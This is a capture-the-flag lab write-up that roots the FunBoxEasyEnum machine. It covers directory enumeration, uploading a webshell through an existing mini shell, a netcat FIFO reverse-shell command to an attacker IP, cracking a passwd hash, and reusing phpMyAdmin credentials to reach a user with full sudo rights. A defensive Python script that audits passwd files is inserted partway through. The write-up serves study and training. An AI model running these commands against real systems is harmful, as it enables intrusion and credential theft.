# FunBoxEasyEnum

## Nmap

```
sudo nmap 192.168.68.132 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Hitting port 80 we come to an Apache default installation page. Viewing the source of this page reveals no interesting information.

![](/files/-MY_yXxinUkPW9By8GL2)

We now move on to enumerating with `dirsearch.py`, first running the SecLists `big.txt` wordlist against the target.

```
python3 dirsearch.py -u http://192.168.68.132/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -R 2 --full-url -t 75 
```

![](/files/-MY_z9s4VVEMQnj87G1b)

We view `robots.txt` and find it contains:

```
Allow: Enum_this_Box
```

I ran `dirsearch.py` against this and was unable to find anything further. Viewing `/phpmyadmin` and attempting to log in with default credentials shows we are unable to proceed with the default root account.

![](/files/-MY_zNIY-sTYLxfiKSBn)

Running `dirsearch.py` again on the target, this time using the `--suffix` parameter to append `.php` to all entries, we find `/mini.php`.

```
python3 dirsearch.py -u http://192.168.68.132/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -R 2 --full-url -t 75 --suffix=.php 
```

![](/files/-MY_zhCQstXsNOBVzVWn)

Browsing to `/mini.php` we come to Zerion Mini Shell 1.0. As shown below, I uploaded a webshell as `webshell.php`.

![](/files/-MYa--NCV21ycnCrKLL3)

Knowing that the above files exist in the root directory, I then browsed to `/webshell.php` and was able to execute commands, confirming we are running as www-data.

![](/files/-MYa-HPvRo4P5niF2WA8)

Running the command `which nc` shows we have `netcat` installed on the target machine. I set up a `netcat` listener on my target machine then ran the following command on the webshell:

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.68 80 >/tmp/f
```

Resulting in a reverse shell.

![](/files/-MYa-xjRIuT7IZp2It9t)

Upgrade the shell:

```
/usr/bin/script -qc /bin/bash /dev/null
```

Checking `/etc/passwd` shows the user 'oracle' has a password hash in the file.

![](/files/-MYa5TNrdyD0EqA8YOun)

I then took the hash and ran it under mode 500 on `Hashcat` on my Windows host, which cracked the password as: **hiphop**

![](/files/-MYa5ki0g9RHkvIOG8s_)
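A defender-side check for the finding above, added here as an example and not part of the original writeup: it flags passwd(5) entries whose password field holds a hash (or nothing) instead of `x`, since any local account such as www-data can read that file. The sample entries, UIDs and placeholder hash are constructed; Hashcat mode 500 corresponds to the `$1$` md5crypt prefix.

```python
import sys

# crypt(5) scheme prefixes; a hash with any other shape is reported as legacy.
SCHEMES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
           "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}

# Constructed sample in passwd(5) format; the hash is a placeholder, not the one from the box.
SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
oracle:$1$EXAMPLE$PLACEHOLDERHASHxxxxxxxxx:1004:1004:,,,:/home/oracle:/bin/sh
guest::1001:1001::/home/guest:/bin/sh
karla:x:1000:1000:karla:/home/karla:/bin/bash
"""

def scheme_of(field):
    """Name the crypt scheme of a password field by its prefix."""
    for prefix, name in SCHEMES.items():
        if field.startswith(prefix):
            return name
    return "legacy-or-unknown"

def audit_passwd(text):
    """Return (user, issue) for every entry whose secret is not deferred to /etc/shadow."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed entry"))
            continue
        user, pw = fields[0], fields[1]
        if pw == "x":
            continue                      # shadowed: hash lives in root-only /etc/shadow
        body = pw.lstrip("!*")            # a '!' or '*' prefix marks a locked account
        if pw == "":
            findings.append((user, "empty password field"))
        elif body:
            findings.append((user, "world-readable " + scheme_of(body) + " hash"))
    return findings

if __name__ == "__main__":
    # Audit the file given on the command line, or the constructed sample.
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    for user, issue in audit_passwd(data):
        print(f"{user}: {issue}")
```

Any entry reported with a hash should be moved into `/etc/shadow` (for example with `pwconv`) and its password rotated, since the hash must be treated as exposed.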

I then used `su` to switch to the user 'oracle' and the switch was successful.

![](/files/-MYa68nZCXhWpCHM3BeW)

After poking about on the oracle user for a bit I could not find anything interesting. I tried the hiphop password against other users and no luck. I decided to move back onto www-data so I can read some files in /etc/phpmyadmin.

I disconnected the shell and ran the initial exploit on the web shell to get connected as www-data. Moving into `/etc/phpmyadmin` and then reading the `config-db.php` file, we see credential information.

![](/files/-MYaBLByDDacy1JjDgMn)

We find the credentials `phpmyadmin:tgbzhnujm!`. I then logged in to MySQL and was unable to identify interesting information in the contained databases.

From here I started throwing the passwords at the users in the `/home/` directory until I got a match on the user 'karla'.

![](/files/-MYaBoarKY3xIr3GCsoc)

Knowing this worked, I exited the shell and logged into `SSH` with the same information just so we have all the advantages of an `SSH` shell.

![](/files/-MYaC4DNmOStUKHxADlk)

Checking `sudo -l` we see Karla can run any command as anyone. For a nice easy root shell we can run the command below:

```
sudo /bin/bash
```

![](/files/-MYaCXPnKpoaM7DA7tGN)


